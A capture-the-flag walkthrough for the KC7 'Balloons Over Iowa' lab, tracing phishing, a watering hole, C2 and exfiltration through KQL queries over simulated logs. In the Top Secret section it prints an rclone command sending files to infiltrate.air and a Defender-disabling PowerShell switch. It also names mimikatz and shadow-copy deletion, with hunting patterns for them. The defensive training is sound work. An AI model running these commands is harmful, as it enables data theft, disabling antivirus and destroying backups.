
KC7 Guide - Balloons Over Iowa

Level 2: Intermediate

Continue to develop your pivoting and analysis skills. Learn about malware, watering hole, supply chain attacks, and more.

For the purpose of this guide, we're going to skip over sections 1 and 5, which respectively serve as an introduction to Kusto Query Language (KQL) and as cybersecurity trivia. Instead, we'll go over sections 2-4, which cover the investigation itself.

Section 2: Aliens

  • Q1. Which email address sent a message containing the domain invasion.xyz?
Email
| where link has "invasion.xyz"

screenshot of query results

  • Q2. How many users received email with links to the domain invasion.xyz?

You can reuse the previous query. Looking at the results shows that only 2 users received emails containing that link.

  • Q3: What was the subject of the email sent in (1)?

That same query shows the subject line needed to answer the question.

screenshot of query results

  • Q4: Who received the email in (1)? (Provide the email address of any of them)

We’re getting a lot of mileage out of that initial query. Using that we can find the necessary info.

screenshot of query results

  • Q5: What file (name) was sent as a link in the email in (1)?

Still using that same query, we can focus in on the link section of the results to find the answer.

screenshot of query results

  • Q6: What is the IP of the user who clicked on the link from the email containing the domain invasion.xyz?

Alright, so this requires a slightly different approach. First we find the IP addresses assigned to the users that received the link, store them with a let statement, then use that set to filter network activity for requests to that file.

let the_ip = Employees
| where name has "peters" or name has "Lawrence"
| distinct ip_addr;
OutboundBrowsing
| where src_ip in (the_ip)
| where url has "Flight-Crew-Information.xls"

screenshot of query results
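The query above hard-codes the two recipients' surnames. The same pivot can be driven entirely from the data, as in this added example (it is not part of the original walkthrough): it pulls the recipients from the Email table, resolves them to workstation IPs through Employees, filters OutboundBrowsing, and joins the hit back to the employee record so the answer row already carries the name and hostname. Column names are the ones used elsewhere on this page; that the Email recipient column holds one address per row is an assumption.

```kusto
// Added example: drive the pivot Email -> Employees -> OutboundBrowsing from the
// data instead of hard-coding surnames. Assumes one recipient address per Email row.
let targeted_users = Email
    | where link has "invasion.xyz"
    | distinct recipient;
let targeted_ips = Employees
    | where email_addr in (targeted_users)
    | distinct ip_addr;
OutboundBrowsing
| where src_ip in (targeted_ips)
| where url has "invasion.xyz"
// join back to Employees so name and hostname come out with the click
| join kind=inner (
    Employees
    | project src_ip = ip_addr, name, employee_host = hostname
  ) on src_ip
| project timestamp, name, employee_host, src_ip, url
| order by timestamp asc
```

One result set answers questions 6 through 9. A recipient who never clicked simply produces no row, which is the same absence-of-evidence signal the walkthrough relies on in question 10.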

  • Q7: What is the name of the user from (6)?

To find the name of the user we switch focus: take the IP address from the previous result and look it up in the Employees table.

Employees
| where ip_addr == "192.168.0.123"

screenshot of query results

  • Q8: When did the user in (6) click on the link? (Provide an exact timestamp)

Using the employee information we’ve obtained from previous queries we can now check the network activity for the user to see when/if they clicked on the link.

OutboundBrowsing
| where src_ip == "192.168.0.123"
| where url contains "Flight-Crew-Information.xls"

screenshot of query results

  • Q9: What is the hostname of the user in (6)

Search the Employees table for the identified user. You may have to scroll to view the results as that table contains a fair bit of info and has many columns.

Employees
| where ip_addr == "192.168.0.123"

screenshot of query results

  • Q10: Did the user in (6) download the file on the link? (yes/no)

Let's look at the file creation history on the host that belongs to that user.

FileCreationEvents
| where hostname == "VRDA-MACHINE"
| where filename contains "flight"

screenshot of query results

No results means the host has no file creation event for a filename containing "flight", so the user did not download the file (or at least nothing was written to disk that this telemetry recorded).

  • Q11: How many total emails were sent by the email address in (1)?

Shifting focus back to the emails, let's zero in on the sender that originally sent the link to the file.

Email
| where sender == "tethys@pocketbook.xyz"
| count

The count comes back as 9 emails sent to the organization from that address.

  • Q12. How many unique filenames were sent by email address in (1)?

Let's take a look at the unique links the sender included in their emails and then narrow that down to unique filenames.

Email
| where sender == "tethys@pocketbook.xyz"
| distinct link

screenshot of query results

Thankfully the result set is small enough to spot-check rather than writing more query lines. There are 5 unique links, but two of them point at the same filename, which leaves 4 distinct files sent by this sender.

  • Q13: What domain did the email address in (1) use to target Richard Clements?

Let's take a look at which link the sender included in the email to that user. parse_url() splits the link into its components; the Host field is the domain we want.

Email
| where sender == "tethys@pocketbook.xyz"
| where recipient contains "clements"
| project domain = parse_url(link).Host
| distinct tostring(domain)

screenshot of query results

  • Q14: When did Richard Clements click on the link sent by the sender in (1)?

We know Richard has been targeted, so let's look at his network activity to see if he clicked on the link from the email.

let the_ip = Employees
| where name has "clements"
| distinct ip_addr;
OutboundBrowsing
| where src_ip in (the_ip)
| where url has "antennas"

screenshot of query results

The query returns a result, which means he visited the page the link led to; the timestamp on that row answers the question.

  • Q15: When did Richard Clements download the file in the link?

We know from the previous results that he visited the link, but let's check file events on his host device to see if the file was downloaded.

let host = Employees
| where name has "clements"
| distinct hostname;
FileCreationEvents
| where hostname in (host)
| where filename has "flight"

screenshot of query results

Unfortunately our query returns a hit – the file exists on his device.

  • Q16: What was the name of the file that Richard Clements downloaded (after clicking on the link?)

The previous query against the FileCreationEvents table shows the information in the results.

screenshot of query results

  • Q17: What file was observed on Richard Clement’s machine immediately after he downloaded file in (16)? Provide the full path

Thanks to the previous queries we know the file exists. Let's copy the timestamp at which it was created and check FileCreationEvents for anything that happened on his host at that time or later.

FileCreationEvents
| where hostname == "HNOA-LAPTOP"
| where timestamp >= datetime(2023-03-04T07:50:39.76128Z)

screenshot of query results

The results show 72 file creation events. The first one is the download of the lure itself, and the very next entry appears only moments after it was created. You may have to click on the `Path` column for that entry to view the entire file path.
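Instead of scrolling through 72 rows, anchor on the download itself and look only at the minutes that follow. This added example (not from the original post) uses toscalar() to capture the download timestamp and between() to bound the window. The path and sha256 column names follow the columns the walkthrough reads from the results grid, and the 5-minute window is an arbitrary choice.

```kusto
// Added example: window FileCreationEvents around the download instead of
// scanning everything after it. Assumes path and sha256 columns exist (the
// walkthrough reads both from the results grid); the 5m window is arbitrary.
let host = "HNOA-LAPTOP";
let download_time = toscalar(
    FileCreationEvents
    | where hostname == host
    | where filename has "flight"
    | summarize min(timestamp));
FileCreationEvents
| where hostname == host
| where timestamp between (download_time .. (download_time + 5m))
| extend after_download = timestamp - download_time   // timespan since the lure was written
| project timestamp, after_download, filename, path, sha256
| order by timestamp asc
```

The after_download column makes the "immediately after" relationship the question asks about explicit, and the same shape works for any dropper: replace the filename filter with whatever identifies the initial file.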

  • Q18: What was the Sha256 hash of the file in (17)?

The previous query also showcases the information that we’re after. You may need to click on the Sha256 column of the entry to view the entire hash value.

screenshot of query results

  • Q19: The hash in (18) can be found on virustotal.com. Virustotal is a malware repository used by many security researchers. What is the reported name of this file on Virustotal?

Let’s copy the file hash and check it against VirusTotal. Use the website’s search function to paste the hash and view what information we get from the results.

screenshot of query results

  • Q20: How many positive detections did the hash in (18) receive on VT?

The results from our search of the file hash on VirusTotal already show the number of positive detections for the file.

screenshot of query results

  • Q21: How many processes were spawned on Richard Clement's machine by the file in (18)?

Filter on the parent process name using part of the filename identified in (17), then count the children.

ProcessEvents
| where hostname == "HNOA-LAPTOP"
| where parent_process_name contains "year"
| count

The results show 2 processes that were spawned by that file.

  • Q22: The file in (18) established a remote connection from Richard Clement’s machine to an external IP over port 443. What was this IP?

Let's remove the count operator and take a look at what these processes are.

ProcessEvents
| where hostname == "HNOA-LAPTOP"
| where parent_process_name contains "year"

screenshot of query results

One of the entries in the results shows an IP address as part of the process commandline.

  • Q23: Shortly after the malware ran, the attackers came back to Richard’s machine to enumerate Enterprise Admins. What command did they run?

We know that the threat actor enumerated enterprise admins, so let's search that infected machine for any process command lines that contain that phrase.

ProcessEvents
| where hostname == "HNOA-LAPTOP"
| where process_commandline contains "Enterprise Admins"

screenshot of query results

The results show the command that was run in the process_commandline column.

  • Q24. What commands did the attackers run to dump credentials on Richard's machine?

There are some well-known tools used to dump credentials, but rather than assume which one was used, let's search the command lines on that host for the string "pass", which would catch "password" and most dump-related switches.

ProcessEvents
| where hostname == "HNOA-LAPTOP"
| where process_commandline contains "pass"
| distinct process_commandline

screenshot of query results

Sure enough, a fan favorite credential stealer (mimikatz) shows up in the results along with the command used to dump the creds.

  • Q25. The attackers enumerated the contents of this folder (name) on Richard’s machine and dumped the contents to a text file

Let's dig into the processes for that host. Assuming the listing was done from the command prompt, we can look for cmd.exe processes whose command line contains both "dir" and a reference to the C: drive.

ProcessEvents
| where hostname == "HNOA-LAPTOP"
| where process_commandline contains "C:" and process_commandline has "dir"
| where process_name has "cmd"

One result is returned and if we click on the process commandline column for the entry we can view the directory that the threat actor was interested in.

screenshot of query results

  • Q26. How many machines have similar commands connecting to C2 (command and control) channels as those observed in (22)?

In question 22, we found that an external connection was made over port 443. So with that knowledge we can try to find if any additional hosts have identical activity.

ProcessEvents
| where process_commandline contains "rundll32.exe" and process_commandline contains ":443"
| distinct hostname
| count

The query returns a count of 36 different hosts that have similar activity on them.

  • Q27. How many unique implants were used to establish these C2 connections?

We can adjust the previous query to count distinct parent process hashes (one per implant build) instead of hosts.

ProcessEvents
| where process_commandline contains "rundll32.exe" and process_commandline contains ":443"
| distinct parent_process_hash
| count

This returns a resulting count of 11 different implants.
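Questions 26 and 27 each answer one dimension with a separate distinct/count query, and both key on the literal ":443". This added example (not from the original walkthrough) extracts the IP:port from every rundll32 command line and summarizes per C2 endpoint, so hosts, implant hashes and the active time range come out in one pass and endpoints on other ports are not missed. The regex assumes the endpoint appears as a dotted IPv4 address followed by a colon and a port, as the question 22 result shows.

```kusto
// Added example: summarize C2 activity per endpoint instead of per port literal.
// Assumes the endpoint appears in the command line as <ipv4>:<port>.
ProcessEvents
| where process_commandline has "rundll32.exe"
| extend c2 = extract(@"(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})", 0, process_commandline)
| where isnotempty(c2)
| summarize
    hosts = dcount(hostname),
    implants = dcount(parent_process_hash),
    implant_names = make_set(parent_process_name),
    first_seen = min(timestamp),
    last_seen = max(timestamp)
  by c2
| order by hosts desc
```

A host that beaconed to two endpoints is counted under both, so summing the hosts column will not reproduce the 36 from question 26; the per-endpoint breakdown is what you want when deciding which infrastructure to block first.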

  • Q28. One of these C2 connections was observed on hostname 0KYU-DESKTOP. When did this occur?

Honing in on a specified device, we can modify the previous query to discover when the activity took place.

ProcessEvents
| where process_commandline contains "rundll32.exe" and process_commandline contains ":443"
| where hostname == "0KYU-DESKTOP"

screenshot of query results

  • Q29: On hostname 0KYU-DESKTOP, attackers ran this command to delete data backups

Let's look at the specific host and check the process history for anything that contains the string "del", a shortened version of "delete".

ProcessEvents
| where hostname == "0KYU-DESKTOP"
| where process_commandline contains "del"

screenshot of query results

For our investigation, this is the smoking gun. WMIC is the command-line interface to Windows Management Instrumentation, and a WMIC shadowcopy delete removes every Volume Shadow Copy on the host, which is what local restore points and many backup tools rely on. This maps to ATT&CK T1490, Inhibit System Recovery, listed in the summary at the end of this post.

  • Q30: It is likely that the observed actor (the one responsible for activity seen in 29) conducted this type of destructive attack

Based on the activity seen in question 29, we can assume that the threat actor is intending to deploy ransomware. With no backups to restore from, a victim is facing the prospect of entirely rebuilding their infrastructure or complying with the ransom demands. In a financially motivated attack, the threat actor just tipped the odds in their favor a bit more.
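The string search in question 29 is scoped to one host. Once you know what the command looks like, the natural next step is to hunt for it everywhere. This added example (not from the original post) searches all of ProcessEvents for the wmic pattern seen on 0KYU-DESKTOP and, from general knowledge of ATT&CK T1490 rather than from anything on this page, also for the vssadmin, wbadmin and bcdedit equivalents; those extra patterns may return nothing in this dataset.

```kusto
// Added example: org-wide hunt for backup/recovery inhibition (T1490).
// "shadowcopy delete" is the wmic pattern seen on 0KYU-DESKTOP. The other three
// patterns (vssadmin delete shadows, wbadmin delete catalog, bcdedit ... recoveryenabled no)
// are common equivalents added from general knowledge, not taken from this dataset.
ProcessEvents
| where process_commandline has_any (
    "shadowcopy delete",
    "delete shadows",
    "delete catalog",
    "recoveryenabled no")
| extend technique = case(
    process_commandline has "shadowcopy", "wmic shadowcopy delete",
    process_commandline has "vssadmin",   "vssadmin delete shadows",
    process_commandline has "wbadmin",    "wbadmin delete catalog",
    process_commandline has "bcdedit",    "bcdedit recoveryenabled no",
    "other")
| summarize
    first_seen = min(timestamp),
    commands = make_set(process_commandline)
  by hostname, technique
| order by first_seen asc
```

Sorting by first_seen turns the hunt into a timeline: the earliest host is the one to pull disk and memory from first, because everything after it is probably the actor repeating a playbook.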

Section 3: Top Secret

  • Q1: On 2023-02-19 at 05:02, Son Johnson downloaded a suspicious Word document file. What was the name of this file?

let son_host = Employees
| where name has "Son"
| distinct hostname;
FileCreationEvents
| where hostname in (son_host)
| where timestamp >= datetime(2023-02-19T05:02)
| where filename contains ".doc"

screenshot of query results

Although our query shows 3 different files in the results, only 1 meets the requirement of matching the date and time stipulated by the question.

  • Q2: From which domain did Son Johnson download the file identified in (1)?

The suspicious file was in Son's Downloads directory, so let's find out how it got there by looking at Son's network activity for the suspicious file.

let son_ip = Employees
| where name has "Son"
| distinct ip_addr;
OutboundBrowsing
| where src_ip in (son_ip)
| where url has "Flight-Crew-Information.docx"

screenshot of query results

  • Q3: What IP address does the domain identified in (2) resolve to?

PassiveDns
| where domain == "espionage.com"

screenshot of query results

  • Q4: What time was the resolution seen in (3) recorded in Passive DNS data? (enter exact timestamp)

The previous query can be used to find the information needed.

screenshot of query results

  • Q5: What other Top Level Domain (TLD) such as .com, .org etc. is used by the domains hosted on the IP identified in (3)?

PassiveDns
| where ip == "131.102.77.156"

screenshot of query results

Thankfully only 3 additional domains appear to be hosted on that address. Two of the four use ".com" as their top level domain, the other two use ".air".

  • Q6: How many domains resolve to the IP identified in (3)?

The previous query already revealed there to be a total of 4 domains hosted on that IP address.

screenshot of query results

  • Q7: One of the domains identified in (6) resolves to an IP that starts with 194. What is this IP?

let domains = PassiveDns
| where ip == "131.102.77.156"
| distinct domain;
PassiveDns
| where domain in (domains)
| where tostring(ip) startswith "194"

screenshot of query results

  • Q8: The attackers performed reconnaissance against our organization using the IP identified in (7). As part of this reconnaissance, the attackers searched for a three-word phrase. What was this phrase?

Time to switch gears and take a look at inbound network activity. Let's use the IP address we just identified as the source address and focus on what they might have been searching for.

InboundBrowsing
| where src_ip == "194.235.79.0"
| where url has "search"
| distinct url

screenshot of query results

The query returns only 3 results, and only one of them is the three-word phrase the question asks for.

  • Q9: Just before downloading the file identified in (1), Son Johnson browsed to a domain. What was this domain?

We can modify one of our earlier queries to zero in on the time frame to just before the suspicious file was downloaded.

let son_ip = Employees
| where name has "Son"
| distinct ip_addr;
OutboundBrowsing
| where src_ip in (son_ip)
| where timestamp <= datetime(2023-02-19T05:02:57.22982Z)

screenshot of query results

The first entry in the results matches the timestamp we supplied and is the file download itself. The entry immediately before it shows that Son was redirected to that page from another domain.

  • Q10: What kind of attack was Son Johnson a victim of?

Redirects like this often lead to drive-by downloads. Because the redirecting domain is aviation-themed, matching the targeted organization's industry, we can assume this is a watering hole attack meant to infect the people who frequent that page.

  • Q11: How many different domains did the attackers use in this kind of attack? (The attack type identified in [10])

Based on the previous activity we know a redirect was served from the blimpgoespop domain. Let's check network activity for anything similar and see how many distinct redirect URLs appear.

OutboundBrowsing
| where url contains "blimpgoespop.com?redirect"
| distinct url

Our hunch was right: 38 distinct redirect URLs, one per domain used in the attack, come back from that redirector.

  • Q12: How many employees at Balloons Over Iowa were victims of this kind of attack? (The attack type identified in [10])

Let’s modify the previous query to focus on source IP addresses instead of unique domains. This will show us how many employees were affected by the same type of attack.

OutboundBrowsing
| where url contains "blimpgoespop.com?redirect"
| distinct src_ip
| count

This query nets us 58 results.

  • Q13: How many different employee roles did the attackers target using this type of attack? (The attack type identified in [10])

Continuing the trend of modifying the previous query, let's use those source IPs to find which roles in the organization were targeted.

let victims = OutboundBrowsing
| where url contains "blimpgoespop.com?redirect"
| distinct src_ip;
Employees
| where ip_addr in (victims)
| distinct role

screenshot of query results

Only two company roles were targeted: balloon pilot and balloon operations analyst.
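Questions 11 to 13 run three near-identical queries. This added example (it is not from the original walkthrough) does the whole pivot in one: it extracts the redirect target from each URL, joins the victim IPs to Employees, and summarizes victims, redirect targets and the active window per role. It assumes the target is carried in a redirect= query parameter, which is what the blimpgoespop.com URLs above suggest, and that Employees.ip_addr and OutboundBrowsing.src_ip are comparable strings, as the in() filters above already rely on.

```kusto
// Added example: watering-hole victims by role in one query.
// Assumes the redirect target is a "redirect=" URL parameter and that
// Employees.ip_addr matches OutboundBrowsing.src_ip exactly.
OutboundBrowsing
| where url has "blimpgoespop.com" and url has "redirect"
| extend target = extract(@"redirect=([^&\s]+)", 1, url)
| join kind=inner (
    Employees
    | project src_ip = ip_addr, name, role
  ) on src_ip
| summarize
    victims = dcount(src_ip),
    victim_names = make_set(name),
    redirect_targets = dcount(target),
    first_seen = min(timestamp),
    last_seen = max(timestamp)
  by role
| order by victims desc
```

Seeing only pilots and operations analysts in the output, with the full victim list attached, is the evidence for the "targeted by role" conclusion and also the list you hand to the people resetting credentials.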

  • Q14: You have received an alert that this employees’ device, - hostname 3CIU-LAPTOP - may have malware on it involving this hash: 4c199019661ef7ef79023e2c960617ec9a2f275ad578b1b1a027adb201c165f3 that was the parent of suspicious processes. What is the name of the file?

ProcessEvents
| where hostname == "3CIU-LAPTOP"
| where parent_process_hash == "4c199019661ef7ef79023e2c960617ec9a2f275ad578b1b1a027adb201c165f3"

screenshot of query results

  • Q15: What is the username associated with the device found in 14?

Let's see which user is assigned to the host that triggered the alert.

Employees
| where hostname == "3CIU-LAPTOP"
| project name, username, ip_addr, email_addr

screenshot of query results

  • Q16: What is the role of (15) in the organization?

Modifying the previous query shows us that the user is assigned the Balloon Pilot role.

Employees
| where hostname == "3CIU-LAPTOP"
| distinct role

  • Q17: You observe that the file (from 14) is launching a process on 3CIU-LAPTOP named rundll32.exe with an external IP address. What is that IP address?

ProcessEvents
| where hostname == "3CIU-LAPTOP"
| where process_commandline contains "rundll32.exe" and process_commandline contains ":"
| distinct process_commandline

screenshot of query results

The query returns 2 results, but only one showcases an IP address: 172.181.104.77:443.

  • Q18: What does this connection (from 17) indicate? (one of the phases of the kill chain)

Looking at the results from the previous query, it shows that we’re looking at C2 activity – command and control.

  • Q19: Investigating compromised devices in the org you find malicious activity using a tool called rclone. What domain is listed in its command line on Julie Well’s device?

ProcessEvents
| where hostname == "3CIU-LAPTOP"
| where process_commandline has "rclone"

screenshot of query results

You may need to click on the process commandline column to view the entire string, but "infiltrate.air" is listed there.

  • Q20: What IP address does (19) resolve to?

PassiveDns
| where domain == "infiltrate.air"

screenshot of query results

  • Q21: How many total domains have also resolved to this IP (the one found in 20)?

Change the previous query to search by IP address instead of domain and we will find whether any other domains share that address. Note that this is the same address espionage.com resolved to in question 3, so the watering hole lure and the rclone exfiltration target share infrastructure.

PassiveDns
| where ip == "131.102.77.156"

screenshot of query results

  • Q22: What does the command found in (19) represent? (Hint: It’s a MITRE ATT&CK Tactic)

rclone.exe copy --transfers12 "*docx" "*xls" "*pdf" "*zip" infiltrate.air

The command shows that a data transfer of specified file types is occurring. This coincides with the ATT&CK tactic – exfiltration.

  • Q23: How many other devices on the org had similar threat activity using rclone on them?

ProcessEvents
| where process_commandline has "rclone"
| distinct hostname
| count

We get a total of 14 host devices with similar rclone activity on them.

  • Q24: The attackers disabled Defender (antivirus) on some devices in the network. How many systems did they do this on?

PowerShell can turn off Defender's real-time protection with a single cmdlet switch (Set-MpPreference -DisableRealtimeMonitoring $true), so let's search command lines for that switch and count the hosts it ran on.

ProcessEvents
| where process_commandline contains "disablerealtimemonitoring"
| distinct hostname
| count

Unfortunately, we see this activity happen on 16 total hosts.

  • Q25: A member of your investigation team reported that host GWB7-DESKTOP was compromised. What is the timestamp of the earliest suspicious process event you observe on this device? (Paste full timestamp)

If you try to look through the process events for the host by hand, you'll end up with 600+ entries. That's too much data to parse. We can narrow the results by looking for the Sha256 hash of one of the implants identified earlier (it appears in the indicators list at the end of this post).

ProcessEvents
| where hostname == "GWB7-DESKTOP"
| where parent_process_hash == "ebff4951be5e2481866fc61806b6bf8ebad297f09632a9c067bcdcec6d203521"

Much better: only 2 results, and the earlier of the two timestamps is the answer. Keep in mind that this only finds children of that one hash; if a different implant had run on the host first, its events would not show up here.

screenshot of query results

  • Q26: What is the command and control (C2) IP address observed on GWB7-DESKTOP

We’ve seen previous command and control activity performed against the organization over port 443. Lets use the information we’ve learned earlier to check against the host.

ProcessEvents
| where hostname == "GWB7-DESKTOP"
| where process_commandline contains "rundll32.exe" and process_commandline contains ":443"

screenshot of query results

  • Q27: What is the timestamp of the earliest Passive DNS resolution seen on the IP found in (26)?

PassiveDns
| where ip == "179.175.35.248"

screenshot of query results

  • Q28: Which of the domains hosted on the IP found in (26) resolve to the most number of unique IPs? If there is a tie, enter any one of the domains.

let domains = PassiveDns
| where ip == "179.175.35.248"
| distinct domain;
PassiveDns
| where domain in (domains)

screenshot of query results

"covert.com" and "deference.com" each appear on only one address, while "deference.air" and "pheasants-infiltrate.com" each resolve to two, so either of those answers the question.
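Question 28 was answered by reading the rows. A summarize makes the tie explicit and still works when an IP hosts dozens of domains. This added example (not from the original post) ranks the domains sharing the C2 address by the number of distinct IPs each has resolved to; the timestamp column in PassiveDns is assumed from question 4, which reads a resolution time from that table.

```kusto
// Added example: rank co-hosted domains by how many distinct IPs they resolve to.
// Assumes PassiveDns has a timestamp column (question 4 reads one from it).
let shared_ip = "179.175.35.248";
let cohosted = PassiveDns
    | where ip == shared_ip
    | distinct domain;
PassiveDns
| where domain in (cohosted)
| summarize
    unique_ips = dcount(ip),
    ips = make_set(ip),
    first_seen = min(timestamp),
    last_seen = max(timestamp)
  by domain
| order by unique_ips desc, domain asc
```

The ips column is the same pivot question 30 performs by hand: every address in it is a candidate to search for in ProcessEvents.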

  • Q29: What is the domain using the “.air” TLD that resolves to the IP found in (26)?

PassiveDns
| where ip == "179.175.35.248"
| where domain endswith ".air"

screenshot of query results

  • Q30: The domain found in (29) resolves to an IP that starts with “144.” What is the hostname on which this IP was used for command and control?

First lets take a look at what IP addresses the domain "deference.air" resolves to.

PassiveDns
| where domain == "deference.air"

screenshot of query results

Now that we have the full IP address, let's check the environment to see if and where it appears.

ProcessEvents
| where process_commandline contains "144.158.189.112"
| distinct hostname

And a single result appears, showing the activity on "RQSO-DESKTOP".

Section 4: Helpdesk

  • Q1: How many emails contained the domain “database.io”?

Email
| where link has "database.io"

screenshot of query results

Only 1 email contains a link to that domain.

  • Q2: What IP does the domain “database.io” resolve to

PassiveDns
| where domain has "database.io"

screenshot of query results

  • Q3: How many domains resolve to the same Ip as “database.io”?

PassiveDns
| where ip == "176.167.219.168"
| distinct domain

screenshot of query results

It turns out that a total of 8 domains share that IP address.

  • Q4: How many emails contained domains sharing the same IP as “database.io”?

Let's save the results from the previous query as a variable and search for any of those domains in the email records.

let domains = PassiveDns
| where ip == "176.167.219.168"
| distinct domain;
Email
| where link has_any (domains)
| count

We get a count of 9 emails that reference the domains found as a result of running the query for the previous question.

  • Q5: What was the most prevalent sender of emails seen in (4)?

Let's modify the previous query to focus on the senders of the emails.

let domains = PassiveDns
| where ip == "176.167.219.168"
| distinct domain;
Email
| where link has_any (domains)
| summarize count() by sender

screenshot of query results

One sender (SSL@hotmail.com) accounts for two thirds of the emails that contained links to those domains.

  • Q6: How many total emails were sent by the sender in (5)?

Email
| where sender == "SSL@hotmail.com"
| count

This reveals to us that the organization received 15 emails from that specific sender.

  • Q7: What was the most prevalent email subject used by the sender in (5)?

Email
| where sender == "SSL@hotmail.com"
| summarize count() by subject

It’s a dirty trick disguising a message as a security alert, but the results show that tactic is used most commonly in the emails sent by the threat actor.

screenshot of query results

  • Q8: Which user named Carolyn clicked on a link containing the domain “hardware.com”? (Provide full name)

let findme = OutboundBrowsing
| where url has "hardware.com"
| distinct src_ip;
Employees
| where ip_addr in (findme)
| where name has "Carolyn"

Our query parameters are very specific and efficient at narrowing down the potential Carolyns.

screenshot of query results

  • Q9: What attacker IP was used to login to Carolyn’s account after she clicked the link?

Make note of the username in the results from the previous query and let's check the AuthenticationEvents table. In this table the source address is stored as a bracketed string (for example "['171.250.201.103']"), so the equality filters in the next two questions copy that literal exactly; a term match with the has operator would match either representation.

AuthenticationEvents
| where username == "caschaeffer"
| distinct src_ip

screenshot of query results

The external IP address should immediately stand out.

  • Q10: How many accounts did the attacker try to log into (successfully or unsuccessfully) from the IP in (9)?

AuthenticationEvents
| where src_ip == "['171.250.201.103']"
| distinct username
| count

The query returns a count of 4 distinct accounts the threat actor attempted to log into from that address.
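Questions 9 and 10 pick out the external address by eye and then hard-code the bracketed literal. This added example (not from the original post) does both steps mechanically: it extracts the dotted IPv4 address from src_ip with a regex, so it works whether the column holds a plain address or the bracketed string seen above, keeps only non-private sources with ipv4_is_private(), and then pivots to every account those sources touched. Whether a logon succeeded is not part of this query, since the page does not show a result column for this table; the timestamp column name is assumed from the other tables.

```kusto
// Added example: find external logon sources for one account, then pivot to
// every account the same sources tried. The regex tolerates src_ip stored as a
// plain address or as the bracketed "['a.b.c.d']" string seen in this table.
let target_user = "caschaeffer";
let external_sources = AuthenticationEvents
    | where username == target_user
    | extend ip = extract(@"(\d{1,3}(?:\.\d{1,3}){3})", 1, tostring(src_ip))
    | where isnotempty(ip) and not(ipv4_is_private(ip))   // drop 10/8, 172.16/12, 192.168/16
    | distinct ip;
AuthenticationEvents
| extend ip = extract(@"(\d{1,3}(?:\.\d{1,3}){3})", 1, tostring(src_ip))
| where ip in (external_sources)
| summarize
    attempts = count(),
    accounts = dcount(username),
    account_list = make_set(username),
    first_seen = min(timestamp),
    last_seen = max(timestamp)
  by ip
```

The accounts column is the answer to question 10, and account_list is the set of users whose sessions and passwords need to be invalidated, not just Carolyn's.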

  • Q11: What filename did the attackers use to exfiltrate data from Carolyn’s email? (Hint: Look at the parameters in the URL)

InboundBrowsing
| where src_ip == "['171.250.201.103']"
| where url contains "caschaeffer"

    screenshot of query results

You may need to click on the entry in the URL column to view the entire contents. But if you look at the text string you can see the name of the file at the end.

  • Q12: When did the attackers exfiltrate data from Carolyn’s email? (exact timestamp)

The results from the previous query show the data exfiltration occurring at 2023-02-11T13:34:31.291779Z

  • Q13: What IP does the domain ‘hardware.com’ resolve to?

PassiveDns
| where domain has "hardware.com"
| distinct ip

We only get 1 hit when looking up potential IP addresses for hardware.com - 53.85.224.235.

  • Q14: This IP (from question 13) is used to find out information about the company. What is the first URL the attackers browsed to from this IP?

InboundBrowsing
| where src_ip == "53.85.224.235"

    screenshot of query results

If you look at the first entry of the results, it shows the earliest time any activity was seen from that address.

  • Q15: What is this type of research technique (from 14) called?

Performing searches for information against a target is considered reconnaissance.

Threat Actor(s)

Summary

The Balloons Over Iowa organization became the target for one or more threat actors. The time frame of the attacks, methods used, and their differing motivations suggests that there was likely more than one group that targeted the organization. One financially motivated actor infiltrated the network and deleted backups in preparation for a potential ransomware deployment while others focused on theft of intellectual property, the execution of a watering hole attack, and exfiltration of company trade secrets.

Initial Access Vector

  • Discovery: T1201 Password Policy Discovery
  • Initial Access: T1566.002 Phishing - Spearphishing Link

Post Exploitation Activity

  • Collection: T1114.002 Remote Email Collection
  • Credential Access: T1003 OS Credential Dumping

Exfiltration and Impact

  • Exfiltration: T1041 Exfiltration Over C2 Channel
  • Impact: T1490 Inhibit System Recovery

Indicators of Compromise:

Files

  • blimp.exe
    • ebff4951be5e2481866fc61806b6bf8ebad297f09632a9c067bcdcec6d203521
    • 4c199019661ef7ef79023e2c960617ec9a2f275ad578b1b1a027adb201c165f3
    • 261e6dc6c25734ddaba007bedb8b474d7be4803d8e724d42637775bd7cc397aa
    • 163873b0e6ce8a9c54df33ed4f8fdee198bd7c6f584a425b7c6ba8830ddfbe42
    • dd053f38f5e60cd8750df450a13833c96d1285e78480323a54abab4a536f6317
    • 3666cb55d0c4974bfee855ba43d596fc6d10baff5eb45ac8b6432a7d604cb8e9
    • ba8a996a117702b946e07dd12d030956efddc159a5e775c18b1a7fb10df13902
    • 370ce39ba328329ff16b5ede1079f6402e68abceb34e65cb31883a3b3730b530
  • helium.exe
    • 3b90ed2209f412de68c3043443ce6f474ea9e54db437ba2372101fa04ffb7d2e
    • dd053f38f5e60cd8750df450a13833c96d1285e78480323a54abab4a536f6317
    • 4c199019661ef7ef79023e2c960617ec9a2f275ad578b1b1a027adb201c165f3
    • ebff4951be5e2481866fc61806b6bf8ebad297f09632a9c067bcdcec6d203521
    • 3666cb55d0c4974bfee855ba43d596fc6d10baff5eb45ac8b6432a7d604cb8e9
    • 163873b0e6ce8a9c54df33ed4f8fdee198bd7c6f584a425b7c6ba8830ddfbe42
    • 370ce39ba328329ff16b5ede1079f6402e68abceb34e65cb31883a3b3730b530
    • 6ef6c499ef61e6ebd8607ae4d5205931b423d1832671e81c3924f8e4a4879fab
  • yeargood.exe
    • 163873b0e6ce8a9c54df33ed4f8fdee198bd7c6f584a425b7c6ba8830ddfbe42
    • ebff4951be5e2481866fc61806b6bf8ebad297f09632a9c067bcdcec6d203521
    • dd053f38f5e60cd8750df450a13833c96d1285e78480323a54abab4a536f6317
    • 98b69ee7028539fe59447b0b919aa2b85be15cec8f1a131c9019ee3ffbd4713b
    • 3666cb55d0c4974bfee855ba43d596fc6d10baff5eb45ac8b6432a7d604cb8e9
    • ba8a996a117702b946e07dd12d030956efddc159a5e775c18b1a7fb10df13902
    • 3b90ed2209f412de68c3043443ce6f474ea9e54db437ba2372101fa04ffb7d2e

Tools

  • Rclone
  • Mimikatz

Addresses

  • 53[.]85[.]224[.]235
  • 118[.]3[.]14[.]33
  • 131[.]102[.]77[.]156
  • 144[.]158[.]189[.]112
  • 171[.]250[.]201[.]103
  • 172[.]181[.]104[.]77
  • 176[.]167[.]219[.]168
  • 179[.]175[.]35[.]248
  • 194[.]235[.]79[.]0

Domains

  • blimpgoespop.com
  • covert.com
  • database.io
  • deference.air
  • deference.com
  • espionage.com
  • hardware.com
  • infiltrate.air
  • invasion.xyz
  • pheasants-infiltrate.com
  • pocketbook.xyz
  • surveil-covert.com
  • surveil.air
